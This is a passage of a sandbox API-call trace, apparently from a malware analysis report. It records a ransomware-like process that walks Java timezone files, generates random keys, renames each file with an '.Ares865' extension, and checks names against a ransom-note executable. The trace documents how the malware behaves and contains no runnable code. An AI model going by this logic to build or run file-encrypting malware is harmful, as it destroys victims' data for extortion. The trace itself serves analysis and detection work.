phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.485] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.485] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.487] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.488] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.488] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.488] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Ashgabat" | out: lpString1="Ashgabat") returned="Ashgabat" [0134.488] lstrlenW (lpString="Ashgabat") returned 8 [0134.489] lstrlenW (lpString="Ares865") returned 7 [0134.489] lstrcmpiW (lpString1="shgabat", lpString2="Ares865") returned 1 [0134.489] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ashgabat.Ares865") returned 61 [0134.489] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ashgabat" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ashgabat"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ashgabat.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ashgabat.ares865"), dwFlags=0x1) returned 1 [0134.490] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ashgabat.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ashgabat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.491] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=269) returned 1 [0134.491] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.492] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.492] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.495] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.495] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.495] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.496] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Baghdad.Ares865" | out: lpString1="Baghdad.Ares865") returned="Baghdad.Ares865" [0134.496] lstrlenW (lpString="Baghdad.Ares865") returned 15 [0134.496] lstrlenW (lpString="Ares865") returned 7 [0134.496] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0134.496] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745c78c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745c78c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745c78c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x4d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Bahrain", cAlternateFileName="")) returned 1 [0134.496] lstrcmpiW (lpString1="Bahrain", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0134.496] lstrcmpiW (lpString1="Bahrain", lpString2="aoldtz.exe") returned 1 [0134.496] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Bahrain" | out: lpString1="Bahrain") returned="Bahrain" [0134.496] lstrlenW (lpString="Bahrain") returned 7 [0134.496] lstrlenW (lpString="Ares865") returned 7 [0134.497] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bahrain.Ares865") returned 60 [0134.497] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bahrain" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bahrain"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bahrain.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bahrain.ares865"), dwFlags=0x1) returned 1 [0134.498] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bahrain.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bahrain.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.498] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77) returned 1 [0134.499] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.499] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.499] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.502] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.503] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.503] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.503] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Baku" | out: lpString1="Baku") returned="Baku" [0134.503] lstrlenW (lpString="Baku") returned 4 [0134.503] lstrlenW (lpString="Ares865") returned 7 [0134.504] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Baku.Ares865") returned 57 [0134.504] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Baku" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\baku"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Baku.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\baku.ares865"), dwFlags=0x1) returned 1 [0134.505] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Baku.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\baku.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.505] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=976) returned 1 [0134.506] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.506] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.506] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.509] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.509] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.509] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.510] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Bangkok" | out: lpString1="Bangkok") returned="Bangkok" [0134.510] lstrlenW (lpString="Bangkok") returned 7 [0134.510] lstrlenW (lpString="Ares865") returned 7 [0134.510] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bangkok.Ares865") returned 60 [0134.510] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bangkok" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bangkok"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bangkok.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bangkok.ares865"), dwFlags=0x1) returned 1 [0134.512] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bangkok.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bangkok.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.512] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0134.513] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.521] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.521] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.524] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.524] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.524] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.525] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Beirut" | out: lpString1="Beirut") returned="Beirut" [0134.525] lstrlenW (lpString="Beirut") returned 6 [0134.525] lstrlenW (lpString="Ares865") returned 7 [0134.525] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Beirut.Ares865") returned 59 [0134.525] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Beirut" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\beirut"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Beirut.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\beirut.ares865"), dwFlags=0x1) returned 1 [0134.527] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Beirut.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\beirut.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.527] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1208) returned 1 [0134.527] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.528] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.528] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.530] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.531] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.531] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.531] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Bishkek" | out: lpString1="Bishkek") returned="Bishkek" [0134.531] lstrlenW (lpString="Bishkek") returned 7 [0134.532] lstrlenW (lpString="Ares865") returned 7 [0134.532] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bishkek.Ares865") returned 60 [0134.532] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bishkek" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bishkek"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bishkek.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bishkek.ares865"), dwFlags=0x1) returned 1 [0134.533] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bishkek.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bishkek.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.534] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=485) returned 1 [0134.534] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.534] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.534] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.537] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.538] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.538] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.538] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Brunei" | out: lpString1="Brunei") returned="Brunei" [0134.538] lstrlenW (lpString="Brunei") returned 6 [0134.538] lstrlenW (lpString="Ares865") returned 7 [0134.539] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Brunei.Ares865") returned 59 [0134.539] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Brunei" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\brunei"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Brunei.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\brunei.ares865"), dwFlags=0x1) returned 1 [0134.541] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Brunei.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\brunei.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.541] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77) returned 1 [0134.541] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.542] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.542] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.544] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.545] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.545] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.546] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Choibalsan" | out: lpString1="Choibalsan") returned="Choibalsan" [0134.546] lstrlenW (lpString="Choibalsan") returned 10 [0134.546] lstrlenW (lpString="Ares865") returned 7 [0134.546] lstrcmpiW (lpString1="ibalsan", lpString2="Ares865") returned 1 [0134.546] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Choibalsan.Ares865") returned 63 [0134.546] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Choibalsan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\choibalsan"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Choibalsan.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\choibalsan.ares865"), dwFlags=0x1) returned 1 [0134.548] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Choibalsan.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\choibalsan.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.548] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=449) returned 1 [0134.548] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.549] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.549] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.551] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.552] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.552] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.553] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Chongqing" | out: lpString1="Chongqing") returned="Chongqing" [0134.553] lstrlenW (lpString="Chongqing") returned 9 [0134.553] lstrlenW (lpString="Ares865") returned 7 [0134.553] lstrcmpiW (lpString1="ongqing", lpString2="Ares865") returned 1 [0134.553] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Chongqing.Ares865") returned 62 [0134.553] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Chongqing" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\chongqing"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Chongqing.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\chongqing.ares865"), dwFlags=0x1) returned 1 [0134.554] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Chongqing.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\chongqing.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.555] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=181) returned 1 [0134.555] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.556] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.556] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.560] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.561] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.561] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.561] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Colombo" | out: lpString1="Colombo") returned="Colombo" [0134.561] lstrlenW (lpString="Colombo") returned 7 [0134.561] lstrlenW (lpString="Ares865") returned 7 [0134.561] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Colombo.Ares865") returned 60 [0134.562] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Colombo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\colombo"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Colombo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\colombo.ares865"), dwFlags=0x1) returned 1 [0134.563] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Colombo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\colombo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.564] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=129) returned 1 [0134.564] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.565] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.565] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.567] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.568] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.568] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.569] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Damascus" | out: lpString1="Damascus") returned="Damascus" [0134.569] lstrlenW (lpString="Damascus") returned 8 [0134.569] lstrlenW (lpString="Ares865") returned 7 [0134.569] lstrcmpiW (lpString1="amascus", lpString2="Ares865") returned -1 [0134.569] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Damascus.Ares865") returned 61 [0134.569] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Damascus" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\damascus"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Damascus.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\damascus.ares865"), dwFlags=0x1) returned 1 [0134.571] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Damascus.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\damascus.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.571] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1300) returned 1 [0134.572] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.572] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.573] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.575] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.575] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.575] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.576] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Dhaka" | out: lpString1="Dhaka") returned="Dhaka" [0134.576] lstrlenW (lpString="Dhaka") returned 5 [0134.576] lstrlenW (lpString="Ares865") returned 7 [0134.576] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dhaka.Ares865") returned 58 [0134.576] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dhaka" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dhaka"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dhaka.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dhaka.ares865"), dwFlags=0x1) returned 1 [0134.578] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dhaka.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dhaka.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.578] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=121) returned 1 [0134.578] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.579] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.579] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.582] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.583] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.583] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.583] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Dili" | out: lpString1="Dili") returned="Dili" 